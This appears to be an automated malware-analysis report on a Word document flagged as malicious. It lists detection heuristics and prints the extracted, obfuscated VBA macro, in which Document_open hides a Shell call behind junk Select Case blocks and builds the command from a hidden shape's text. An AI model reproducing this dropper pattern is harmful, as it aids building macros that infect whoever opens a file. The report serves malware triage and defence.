MALICIOUS
272
Risk Score
Heuristics 9
-
ClamAV: Doc.Malware.Dkvn-6774407-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dkvn-6774407-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End Select MvSMPmaP = Array(wlwzpbkfj, EQBwE, wKavjmF, Interaction.Shell(XBZlzs, ijvwVIlAiMQ), hYEvXj) Select Case lkZtUXOiZsLnjoOaMvsnZzu -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9266 bytes |
SHA-256: 92a201150cc3a8b7cb3ef60dfc6ba9cf567a366f613a4c2153026ec3320e4f04 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
203 of 248 identifiers look randomly generated (e.g. 'bjWNashWfuMNsaNKNcpVtvhb') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sNaZunot"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case DJzrOnttFiMnDpI
Case 300696982
qEfOuYZiqrjRwCzajVZjMzqt = 222539818
njkBFrOhavwtIl = 156372881
YvMbGbMMUTiNktO = ChrB(248991227 / ChrB(216673556))
lqzompDQcEipNoIDZuhGvLW = hlIBzhjKMQAhLjJWYqw
Case 56305543
iGuEhTTEawZTZGBjCTvXT = 187398069
obrplKhFNNpCiOwPNNGmUaNm = 191764712
qWWDlOCKFdqiitt = ChrB(280188048 / ChrB(82752725))
kDWRGDhKNqcONFM = 193283281
End Select
Select Case FdLozhtzdROLRO
Case 153190123
rHdmzVuCZnpOiXTzqhLiYGEh = 277338225
RRqsJtHnkvniDjiIOMrfVFzQ = 139048681
CsYkDvwAEdMhiwHrnYKHd = ChrB(185050879 / ChrB(311417282))
rrqLdLUZXYqOPzrsm = fFwhiuXdRZGNHa
Case 327146956
tLElXsJmKFGscoj = 121003251
azpUKJwnAtuTJRPQHG = 209999011
AfmwJWcofBdtnsjdIniCIw = ChrB(151883615 / ChrB(336506532))
TBoqcUiAfUuKtKnjH = 52945663
End Select
Select Case fAzwAGDmrvvPnCZomRCoQZnK
Case 144406684
isVjPcoXuAOjrJhf = 86565859
msPbjOQrlqiGNmcpcKRI = 210728588
aQHZaCZsGkMJYduDJ = ChrB(46578284 / ChrB(125371004))
qwoonbHChXOEzTRzTKo = StjwtDOwuZBJpIbc
Case 180400440
lzvXKjVILEMujwSFF = 328864893
qujMIHIVEOprpYBYp = 121065227
iAclsKmzpDrkDdNkXCmmPCN = ChrB(112316131 / ChrB(298733779))
MWWiZdnKPOOJrBVHSS = 88702478
End Select
Select Case NMQGRoilssdvofZWYJuw
Case 228502842
jWrMpHcXzVzaHbGafMkf = 179589629
BDnfimhicStkft = 97623988
wWJVtHwNYwPwiiN = ChrB(23786056 / ChrB(7527082))
UoZKdpqVtijWvMLaONVF = tFZGjXiztFqjBYaf
Case 257601676
TfYNTjBCCmETzhvTbjzEwSH = 140060333
ZqmuolubUCaljl = 296759067
dUwvZFIohzqfiwB = ChrB(154905485 / ChrB(20667106))
uqPIOAJsffUiuwGz = 125713231
End Select
Select Case lXLUSsKFSUJWswTtq
Case 189400469
dMkEUClltjfkVHG = 3746331
DJcdqkGODRrEkZLhOXEBTqR = 220954611
RVnjnOmzYqjAimb = ChrB(196819807 / ChrB(273169270))
ltjIJTCGkBzbMruVZ = TiQCFGMiihjkdXiZj
Case 262476969
IMTjjikwzipGJNMKKAi = 265555880
waoVWzYbznKGuQCzzjX = 140063177
OEoaaXQMTYzzBMl = ChrB(201728898 / ChrB(73740810))
fLWArfzOwKKMQLTR = 221193868
End Select
Select Case iQUQtUvjDEnqWici
Case 220574110
uwloatbnBfLLJOYQLYOnKVjU = 171474739
JDbWszqXBFYuqboF = 121003396
YsvYSGXEPtlYMQOQj = ChrB(163662543 / ChrB(78173906))
mMVlNSrQinzEDTwhOkkU = ojwmcsIjZrPumiLXKLzPGVbt
Case 221074783
tTjCzoqhwcYzkajkIw = 240947115
QplKDYkFrSICEHwo = 341698425
saDEfiwLbZfVNfJXFE = ChrB(224016763 / ChrB(139811943))
aDlqfUVudbulkDJHLJCMszKa = 142464077
End Select
Select Case TjACMWGaaKZBqWLnHcrkri
Case 286714454
MMjRRXCLGowiDAvAXrSKS = 289115473
DijBDbYzksRpzppIDHNuCZhj = 49510535
rNzQjQVOdmlWzjipMmmKv = ChrB(67749920 / ChrB(223186003))
ODEzwizztWkLzULBUlMDX = IiMNNvzwlhfQBdLXRwon
Case 186952117
zWprakqKziLivaljRBAw = 240984443
jjShqwUNOjEfip = 155527424
UMGbjAETikmhhnnfsw = ChrB(280666765 / ChrB(38598966))
sutqjQbdQwvLvjnqJTf = 204602244
End Select
Set thBuGiY = sNaZunot.Shapes(XSOzOc + "NPwAGVqk" + wwkkcb).TextFrame
Select Case UHEZHvzSVcwPojhZoNzdMsqp
Case 106349102
zcLGhIHlMtbsNJruIkpJqGWP = 266680146
IplbROJLvVHOvo = 55044879
XnwvzomRkGzGFt = ChrB(41650331 / ChrB(314880749))
czRzkcMjBNVntoBBm = iQtEUCTrLOCGCPLwSoqDm
Case 73436209
LwbRiqRwFTKXiYYfOjtQzj = 314527925
GczVMKiwXihFslpB = 302935562
zmsrjXuJcXtuofCQK = ChrB(13223442 / ChrB(297764467))
mvkNAArSmcqsWhjISPvZbChL = 21151156
End Select
Select Case bjWNashWfuMNsaNKNcpVtvhb
Case 188250859
OGTUabrkSpFUjsU = 289596302
HrDiKuEjhzGFjB = 311431938
VdaCKUkVIIYFswwBBrakY = ChrB(173577983 / ChrB(26710026))
PltblimnKjKPtptm = hWCVzrkDFEobKMv
Case 168842342
nZbIkdWkvImjILwn = 196162037
DBqPtIXfazMzXOpfCTLzztj = 246205852
iwXwspohVrYXXf = ChrB(120919036 / ChrB(243779872))
CYYwlXrcIfbjtK = 137760325
End Select
Select Case fhdBFjGKfjhoit
Case 261638071
UTWrMNwiRzCOmKWraTEj = 310503145
RaiEiUVwuLtdSEs = 13462472
RjzkGhsXVKqNKoHiMBwIHj = ChrB(197058338 / ChrB(64602250))
ErUJrRwYjmwwXLtqhJ = iijWmvGCwtjiFpPB
Case 275414910
NdssoiBKmoqDRZZTfmV = 137697290
OlOBizErGHJDSTfRmtFUb = 59779731
MtbGIlKdjUqzsiqKi = ChrB(324345069 / ChrB(129712947))
hjzzGuCstPAGFTCHDtvF = 320354560
End Select
Select Case CXRwiQqMbzlqZd
Case 199305663
UjwqizSiMkswIhCkSjZb = 313340271
GLKhpLNkwpKwmKafRFEijuY = 297540785
uuAYpDCkadmfBH = ChrB(52422055 / ChrB(135752599))
nDmKurKmRUXMKMnRcuQ = MHlHNMhnzQzwOHGU
Case 46140740
zDplYjfXQRzNYNrHPjRiwiJ = 152141725
AWawDFSKivMXaiCcpvQnls = 240932154
GrZDczRtSzXMEY = ChrB(85603459 / ChrB(75149234))
DpRfjozOCHmtjAImWrLjO = 224389229
End Select
XBZlzs = thBuGiY.ContainingRange + BWRIfn + KAjiH + srHNI + fUjKMAb + SMVHk + riTATNs + QAijAZ + kVPwzL + XrMiNZ + pOqSSl + FTihaOqZ
Select Case qzRUtkIMzqcqIdKjoOBOh
Case 196010976
uwIHwwVvzjwtCJDW = 164005452
CNaZhOnsiGGtfA = 80999374
XVlcLPiviHKkIZkrcMfQm = ChrB(134305964 / ChrB(116807284))
UDSPoEDzhRmilwqnjivZDDk = VORTVwzDDrHIzPG
Case 171628805
NCqnCGjWsjHYrq = 116204499
NtamjbkUiitohpTYVV = 279667195
tQTHlzdPqiLBqp = ChrB(234332899 / ChrB(142616437))
nUlRWEYNroCMjDVzRawa = 126114149
End Select
Select Case UBTzYaBjktlELnhhzT
Case 102566246
MANhZHtVjuXKMDppMOZ = 48825575
hBfdnFGYiAYQNKTnlYQj = 207953519
pVasIzsVitItfziDlCmwEtzu = ChrB(333579692 / ChrB(294263630))
CbqJaAkLJCvzJjJSiH = fUEhmOuiswWftPbptr
Case 239916652
tunZAqEdQvbUmiNBztEvj = 113258881
PmXBhhqPauaakjihvJQSwUC = 297490974
CasAnpBcBYndoXwZj = ChrB(8330367 / ChrB(175171639))
DcUSMIlPwwukdmfG = 334440875
End Select
Select Case YHiWSWdcrZdTDjwTRmdL
Case 273780529
AMfnQFVGpLCPndDQdVX = 190188130
TScLKYAdwZZpwHSqfGXH = 244059359
RQnsSQAIHoMwjtDcGjUct = ChrB(249663256 / ChrB(193609227))
oWlawPzVrkALYSFkdoR = dCbYnCzqmIqfnNDwiaKsp
Case 283733545
vsrEobjzFUswmuM = 254073917
PIijuUYKOJFDdZvmzfjvwLPC = 62407427
LuQQBSnOcjIVBXTtZRivb = ChrB(306951683 / ChrB(322867631))
pPjqzDsfZIIdtwHn = 103719254
End Select
Const ijvwVIlAiMQ = 0
Select Case BtmaYchSYUuFUCEsFRwpp
Case 187794346
lGMOkwbsjuappJ = 98225520
YOHzCDkwjtkNYBR = 315841469
sBTMOwTwcKLuMOirKYb = ChrB(219998604 / ChrB(202631888))
iVQiqNOTidiQzIvvJRnAasZB = fBWNdpOuuSwvfGGiIc
Case 226555263
wRavOOKtdXqwOOLLr = 39200543
nPVCpwziLhRRPq = 249212331
ObazPfUQWcBhRvurCY = ChrB(307602056 / ChrB(1161238))
OlzOkzMMGaFcrzkRGpI = 309256563
End Select
Select Case HjUTcIVGJHGFIhuJFpINm
Case 84188220
XoYKZLoqizESBZudjWYut = 237042178
RvMhScnmzuuwiDwwvVR = 185573610
DPtkKLcqNSsnMGO = ChrB(81769934 / ChrB(197164937))
NqKHXGcPaiZdZbHTNj = zIQLwjcCJRzjkRADlz
Case 315196457
mIultRktQfttisjNziOYuET = 329497858
wpMYYVWRohpNiSfwjldY = 23832465
rknGHiXwhowIub = ChrB(162456343 / ChrB(132970188))
JWbtLrzSMjaLSpZZzzblROo = 305928161
End Select
Select Case wEjbIzbFAZaIBn
Case 133174443
ioDGtiTwFFsGjtzfdDpZ = 167416609
uCZnoArFUAlPhm = 36874064
GRlhWCEVYHbuizwuEdtAjGp = ChrB(122206130 / ChrB(48305030))
ksUQLKZizXorfswEOhYwaXCq = EtEOzcSaWRMAHvQU
Case 316687706
aGMzBCbsItKYNp = 201039220
HRUUzuVRIamDGlH = 182631761
WbjzGsCmHUZPzDWWCozz = ChrB(181238338 / ChrB(22022786))
lupaQYlWljurOuFAZSip = 171147471
End Select
MvSMPmaP = Array(wlwzpbkfj, EQBwE, wKavjmF, Interaction.Shell(XBZlzs, ijvwVIlAiMQ), hYEvXj)
Select Case lkZtUXOiZsLnjoOaMvsnZzu
Case 191950469
INJthkJsMtQEfIT = 315640933
hmlnSoIMDOMrTmqwo = 82862828
FkrICvWuwWhnYrKS = ChrB(49775298 / ChrB(287010483))
pYAhdVwAsHaIrvJqi = ijrwtKqWbnzJTiEWXlFDNn
Case 35440258
inYOqrPBjcdIatipqHtJBjn = 286645926
UYYlacrdzRFmcj = 237922575
wcrFwvdGPMGtwtuAjKV = ChrB(121855238 / ChrB(280533526))
GAmidbZDOaJkCGvmH = 165561105
End Select
Select Case ZBLopsYNBsYJsYPSjHqjfif
Case 298598558
LldjqnzrOXzjpwKtYTf = 130734303
wukspYKiOvWSNdHvhKEYSiBS = 251554931
IfqGLzZdMqtnAPpMzbbNbUC = ChrB(328657719 / ChrB(284395870))
buiUsRFzPioHkXt = RRBtJpjFiZrYPndsPCXiw
Case 289301271
bhBzKYsrDUrDlwzzlLZqSahj = 186081095
vsizOlZSaLHqYh = 253523018
nEXkrwSClTZBfAARXJczJ = ChrB(28539022 / ChrB(39141110))
iSWlrvmrDkndLsJ = 338050843
End Select
Select Case TkETqHtlKPpOWM
Case 233048180
LPOuJpiMiVrzNN = 11100875
rIXDAaMpimjcoaZNU = 128118898
jAztiGrpVPvXwNZWOofzkD = ChrB(169822376 / ChrB(106106927))
FBYDvdctbUPuOtzJlq = iPmOPELZpTBdahWYETl
Case 170981995
SdVtJcAviqzMAhHTmIzkE = 262674035
ZroMrVspzRnQlRVFcKi = 43026783
CRaAPFSKmpjiDvBVPIZp = ChrB(4670341 / ChrB(644505))
MQWBQCWZahwWaNMcQaiMbHmh = 146403179
End Select
Select Case NFhlRwlXbzKSfdShC
Case 204691036
iqtMBFQMPtizNI = 342145843
SHVfkhBpmCOVlS = 291496707
fOkbTtfjBlVdsAwJfa = ChrB(421806 / ChrB(171019697))
ATBoDZwruazBLTwYYkZb = dwMYzmFFqLSSqfvjmPThpG
Case 71927511
cjjwkGpawqWUoQGnsl = 30053537
fjVoCplUFuAXoovQF = 50565206
jWrTAIbuWIjoDBvstL = ChrB(289943531 / ChrB(310967076))
UUVEpzjAUqhlRVsoPVfbuPMY = 34763517
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.